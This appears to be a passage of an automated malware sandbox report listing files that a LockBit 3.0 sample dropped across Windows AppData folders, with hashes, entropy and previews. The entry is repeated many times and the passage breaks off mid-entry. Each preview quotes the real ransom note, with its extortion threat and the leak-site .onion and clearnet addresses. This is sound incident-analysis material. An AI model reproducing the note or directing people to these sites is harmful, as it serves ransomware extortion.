                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.978936007893284
                Encrypted:false
                SSDEEP:192:wrm4x1E8th9SXD5RPkQvEJK5s+KMjd/ZbSRtsT3xReOh81AnEo:wBH9SX/nvHeRMRZYtsTDeOMAt
                MD5:BED9D4A4ED9B094BEBC07980F046B0B2
                SHA1:C65B55EE46B897B98CB0DFD5EBD192B0A8130DAC
                SHA-256:CAE37FB7C35962ACBC3124A46D3FF99D6B9BE7A498D731B19D02DD8D1A3648F2
                SHA-512:31B0E2948885E0878975FDD625237D8147B2FD00E5BA5EF22F7EC7EC03011E15F30A9CD27EBA3E9C4746FCC1B0944BE89F90A89AC6DED02F060A4CE5AAF7C324
                Malicious:false
                Preview:......<O.B.I..5..%.wj..~..k..+....^PT.-.%.*a....o$.Ny?!.g..._...fL...\..E.H.bZ%.....it..W%.A5Q.......-.hQt..uU........8Z....@R......sb"..d..]W.....0.2."..7.....b\..=.Q...3RZ#.>....w.Y4...s..pi..@".x:..;.:U.J.......^1;.......9jTnv..x..I.*..V.s/g.uel(.x.Rex..j.P8..O4..r....&;..h.E!:-..I..1....sRO....Tr.C.i..[...;./....49ec,.D.07a......B.a../R.7).....u#....,..V..F.q..x....r....!.....[.~)....Z....#..*..g....f.+...w...k...vO..}\..1...z.3..T.ndA.6.TG..........Vyt.....S..5/....V./.S......Or.....*..y..........G.s....$jo.;G=.&...3...}J.|#...Pcr^....d...&...wx..Y.j..0/0.8...;.9.d....D./.T...c......L:9.P....BA......[.E:......8Y.l. .P.qB.<n2?D.......GJ....e.....2k.g)5XP.U@.a..YVy..F|......qWbx&...b..0...z5.Q%.|.....>+...}.z..R.._-....^S..R.}J1>.h..^a."..c..cpd...$.$....S....`.Y..x.r..%....L.)s&.u^......,...(.t.TH..d.q\wj.|....."QjK...R.........a...V.r...v..[.J5.....k#......d.o.l..qKyU..!$.A.p..`.U.I,a.I.V.#.z@.1l..m...]..VV....w7(s...[..x$F.2.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
